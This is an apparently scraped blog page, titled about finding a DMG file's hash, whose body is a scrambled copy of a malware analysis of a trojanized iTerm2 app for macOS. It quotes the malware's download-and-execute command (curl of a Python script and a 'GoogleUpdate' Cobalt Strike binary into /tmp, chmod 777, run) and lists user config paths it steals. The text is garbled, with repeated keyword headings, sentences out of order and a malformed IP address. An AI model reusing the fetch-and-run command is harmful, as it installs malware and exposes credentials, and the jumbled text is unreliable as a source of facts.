satdemo.blogg.se - Find hash code of dmg file mac

#FIND HASH CODE OF DMG FILE MAC ZIP FILE#
#FIND HASH CODE OF DMG FILE MAC DOWNLOAD#

As shown in Figure 6, all of these websites resolved to the same IP address, 43129218115.īesides the g.py script and “GoogleUpdate” components that are part of the trojanized iTerm app malware routine, the second-stage server also hosts four other Mach-O files that are used as post-penetration tools (Table 2). Searching VirusTotal for the Secure Sockets Layer (SSL) thumbprint that used revealed several other fraudulent websites.

~/Library/Application Support/iTerm2/SavedState/įurther analysis of the trojanized iTerm2 app’s Apple Distribution certificate led us to find similar trojanized apps on VirusTotal (Table 1), all of which were trojanized using the same method.

~/Library/Application Support/VanDyke/SecureCRT/Config/.

The Python script g.py collects the following system data and files from the victim’s machine, which the script then sends to the server:

#FIND HASH CODE OF DMG FILE MAC DOWNLOAD#

Download “GoogleUpdate” to the folder /tmp/GoogleUpdate and execute it.Download the g.py script to the folder /tmp/g.py and execute it."curl -sfo /tmp/g.py & chmod 777 /tmp/g.py & python /tmp/g.py & curl -sfo /tmp/GoogleUpdate & chmod 777 /tmp/GoogleUpdate & /tmp/GoogleUpdate".Once executed, the malware connects to its server and receives these instructions from it: This is a clever method for repacking legitimate apps that we have not seen before.

#FIND HASH CODE OF DMG FILE MAC ZIP FILE#

The files that are downloaded from the legitimate website come in a ZIP file format, as opposed to the DMG file from the fraudulent website, as shown in Figure 2.Īccording to Objective-see’s blog post, the malicious codes contained in the libcrypto.2.dylib file are executed automatically when the victim runs the trojanized iTerm2 app. The user is redirected to this download URL for iTerm.dmg regardless of the app version the user selects to download from the fake website the real website has different URLs and files for various versions.

Instead, the website contains a link, hxxp://from which users are able to download a macOS disk image file (DMG) called iTerm.dmg. However, the malicious file is not hosted on this website directly. The trojanized appĪs of September 15, is still active. This blog entry covers the malware’s details. This, in turn, downloads and runs other components, including the aforementioned g.py script and a Mach-O file called “GoogleUpdate” that contains a Cobalt Strike beacon payload. Objective-see previously published a blog entry about this malware, which analyzed how the threat actor repacks the iTerm2 app to load the malicious libcrypto.2.dylib.